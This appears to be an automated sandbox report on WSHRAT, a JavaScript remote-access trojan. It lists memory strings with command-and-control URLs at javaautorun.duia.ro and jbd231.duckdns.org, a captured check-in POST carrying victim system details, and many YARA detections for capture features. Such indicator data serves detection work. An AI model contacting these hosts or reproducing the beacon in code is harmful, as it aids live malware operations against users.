              Source: wscript.exe, 0000000E.00000003.481502625.000001E45640E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.816513877.000000D86C2F2000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.546074627.000001E4563F2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.847586711.000001E4568C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/
              Source: wscript.exe, 0000000E.00000002.891459957.000001E456AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vre
              Source: wscript.exe, 0000000E.00000002.892699772.000001E4570B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vre#
              Source: wscript.exe, 0000000C.00000002.844278843.000001531A030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vre$K
              Source: wscript.exe, 0000000E.00000002.892699772.000001E4570B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vre.
              Source: wscript.exe, 00000004.00000002.882445640.0000020016851000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vre.duia.ro:5465/Vre
              Source: wscript.exe, 00000001.00000003.379518455.00000228B31AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vre0
              Source: wscript.exe, 0000000E.00000002.819896845.000001E4548B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vre1_
              Source: wscript.exe, 00000006.00000002.848811043.0000026E2ADF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.847586711.000001E4568C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vre63209-4053062332-100
              Source: wscript.exe, 0000000E.00000002.892699772.000001E4570B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vre:
              Source: wscript.exe, 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/VreConnectionKeep-Alive
              Source: wscript.exe, 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.856776176.0000026E2AE71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.835362703.0000029D802A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.854455926.000001531A0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/VreM
              Source: wscript.exe, 0000000C.00000002.854455926.000001531A0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/VreM3:.0
              Source: wscript.exe, 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/VreMC
              Source: wscript.exe, 00000008.00000002.869225763.0000029DFD7E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/VreMe
              Source: wscript.exe, 0000000C.00000002.858724337.000001531A102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/VreN
              Source: wscript.exe, 0000000C.00000002.844278843.000001531A030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/VreS
              Source: wscript.exe, 00000006.00000002.875779129.0000026E2AEF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/VreY
              Source: wscript.exe, 00000001.00000002.847538264.00000228B2A80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.842409404.0000020016230000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.846562471.0000026E2A810000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.827729174.0000029D80190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/VreYWNlKCIl
              Source: wscript.exe, 00000001.00000002.847538264.00000228B2A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/VreZXNwb25z
              Source: wscript.exe, 00000004.00000002.842409404.0000020016230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/VreZXNwb25zf/
              Source: wscript.exe, 00000001.00000002.847538264.00000228B2A80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.842409404.0000020016230000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.846562471.0000026E2A810000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.827729174.0000029D80190000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.843831563.000001531A020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vrecnkgew0K
              Source: wscript.exe, 0000000E.00000002.891459957.000001E456AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vrecnkgew0KhN
              Source: wscript.exe, 00000004.00000002.892957672.0000020016F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vred
              Source: wscript.exe, 00000001.00000002.847538264.00000228B2A80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.842409404.0000020016230000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.846562471.0000026E2A810000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.827729174.0000029D80190000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.843831563.000001531A020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/VredmFyIGZy
              Source: wscript.exe, 0000000E.00000002.891459957.000001E456AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/VredmFyIGZyhN
              Source: wscript.exe, 0000000E.00000002.847586711.000001E4568C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vref
              Source: wscript.exe, 00000004.00000002.882445640.0000020016851000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.835362703.0000029D802A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.869237827.000001E456940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vreh
              Source: wscript.exe, 0000000E.00000002.891459957.000001E456AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/VrehN
              Source: wscript.exe, 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.379274839.00000228B317E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vrej
              Source: wscript.exe, 0000000C.00000002.858724337.000001531A102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vrel
              Source: wscript.exe, 00000004.00000002.882445640.0000020016851000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.835362703.0000029D802A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.869237827.000001E456940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vreo
              Source: wscript.exe, 00000001.00000002.851874113.00000228B3130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vreoh_AE
              Source: wscript.exe, 00000008.00000002.869225763.0000029DFD7E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vreoi
              Source: wscript.exe, 00000006.00000002.848811043.0000026E2ADF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vreor
              Source: wscript.exe, 00000006.00000002.856776176.0000026E2AE71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vrer
              Source: wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vrero6
              Source: wscript.exe, 00000001.00000002.847538264.00000228B2A80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.842409404.0000020016230000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.846562471.0000026E2A810000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.827729174.0000029D80190000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000C.00000002.843831563.000001531A020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.891459957.000001E456AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vres);
              Source: wscript.exe, 00000001.00000003.378710691.00000228B3161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vresofdowches
              Source: wscript.exe, 00000006.00000002.875779129.0000026E2AEF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/Vrew
              Source: wscript.exe, 00000008.00000003.394109169.0000029D8001A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://javaautorun.duia.ro:5465/ZpbGU
              Source: wscript.exe, 00000002.00000003.401450984.0000025291BC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.893140463.0000025291BBB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401644606.0000025291B83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525815657.000001B9F4459000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525315950.000001B9F448D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525373780.000001B9F444C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525509334.000001B9F4453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.893638808.000001B9F444E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org/
              Source: wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401644606.0000025291B83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org/1
              Source: wscript.exe, 0000000D.00000003.525815657.000001B9F4459000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525373780.000001B9F444C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525509334.000001B9F4453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.893638808.000001B9F444E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org/O?
              Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org/ilter-0000
              Source: wscript.exe, 00000002.00000003.401571383.0000025291BD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org/on
              Source: wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.882599346.000001B9F3D50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.876023477.000001B9F39A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525194748.000001B9F4426000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.893517385.000001B9F4442000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.894277954.000001B9F44A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.818184193.000001B9F19C8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525722834.000001B9F39A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-ready
              Source: wscript.exe, 0000000D.00000002.893254770.000001B9F4429000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-ready#X5
              Source: wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.886964153.0000025291B72000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-ready&
              Source: wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-ready-
              Source: wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-ready.
              Source: wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-ready3
              Source: wscript.exe, 0000000D.00000003.525815657.000001B9F4459000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525373780.000001B9F444C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525509334.000001B9F4453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-ready32
              Source: wscript.exe, 00000002.00000003.401463583.0000025291BCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-ready?
              Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readyAN
              Source: wscript.exe, 0000000D.00000002.894277954.000001B9F44A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readyD
              Source: wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readyEM
              Source: wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401644606.0000025291B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readyG
              Source: wscript.exe, 0000000D.00000002.893254770.000001B9F4429000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525194748.000001B9F4426000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readyI
              Source: wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readyK
              Source: wscript.exe, 00000002.00000003.401571383.0000025291BD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readyL
              Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readyT
              Source: wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readyXFwuXFxyb290XFxjaW12MiIpOw0KdmFy
              Source: wscript.exe, 0000000D.00000002.882599346.000001B9F3D50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-ready_
              Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readyady
              Source: wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readyady.
              Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readyadyEM
              Source: wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readyas
              Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readyckdns.org:2022/is-ready
              Source: wscript.exe, 0000000D.00000003.525815657.000001B9F4459000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525373780.000001B9F444C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525509334.000001B9F4453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.893638808.000001B9F444E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readyd8
              Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readye
              Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readyed.
              Source: wscript.exe, 0000000D.00000002.893638808.000001B9F444E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readyh8
              Source: wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readym32
              Source: wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readymFtZS5zcGxpdCgiLiIpWzBdLC
              Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.400937487.0000025291B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401267934.0000025291B77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401644606.0000025291B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readys.org:2022/is-ready
              Source: wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readys.org:2022/is-readypData
              Source: wscript.exe, 0000000D.00000003.525815657.000001B9F4459000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525373780.000001B9F444C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525509334.000001B9F4453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.524400656.000001B9F443D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000003.525031245.000001B9F4445000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readysL8
              Source: wscript.exe, 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readyspecified
              Source: wscript.exe, 00000002.00000002.893454601.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401571383.0000025291BD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.889666132.0000025291B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:2022/is-readyt
              Source: wscript.exe, 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jbd231.duckdns.org:20ecuritycenter2=
              Source: wscript.exe, 00000001.00000003.378593227.00000228B31F2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.401450984.0000025291BC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.893140463.0000025291BBB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000004.00000002.854554678.0000020016790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.831690125.0000029D80281000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.869237827.000001E456940000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: wscript.exe, 0000000C.00000002.854455926.000001531A0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com=
              Source: wscript.exe, 00000006.00000002.856776176.0000026E2AE71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comZZZZ
              Source: unknownHTTP traffic detected: POST /is-ready HTTP/1.1Accept: */*user-agent: WSHRAT|0453C53E|computer|user|Microsoft Windows 10 Pro|plus|Windows Defender .|false - 3/10/2022|JavaScriptAccept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: jbd231.duckdns.org:2022Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
              Source: unknownDNS traffic detected: queries for: javaautorun.duia.ro

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Yara detected WSHRAT
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000002.00000003.346293587.0000025291B28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.894056339.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.525478987.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.436933297.000001A3A0C9D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.882434337.000001B9F39C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.359362375.0000020CC9D9D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.436804080.000001A3A0C8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.475419032.000001B9F3810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.306663834.0000023FB2AA9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.365466857.0000020CC9121000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.346110513.0000025291AEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.345846246.0000025291B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.525911410.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.436967612.000001A3A0CC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.362775717.0000020CC9DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.870934692.00000252913C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.459088306.000001A3A05B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.359178897.0000020CC9DA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.360228659.0000020CC9120000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.524775302.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.442339424.000001A3A0CC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.312164849.0000023FB2B5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.364188132.0000020CC934C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.307173276.0000023FB2943000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.857351439.0000025290FE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.890666886.000001B9F43C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.306477021.0000023FB35AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.473292279.000001B9F43D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.437852144.000001A3A0010000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.306511935.0000023FB35C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.347539680.0000025290E23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.878368097.0000025291B0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.525586861.000001B9F4488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.311353679.0000023FB35E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.307581623.0000023FB294F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.359292280.0000020CC9D8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.346359959.0000025290FB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.473654682.000001B9F43BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.473826322.000001B9F43CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.360037491.0000020CC9113000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.436996885.000001A3A01A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.346253406.0000025291AFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.443498942.000001A3A024C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000003.436753264.000001A3A0CA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000003.473870911.000001B9F3994000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
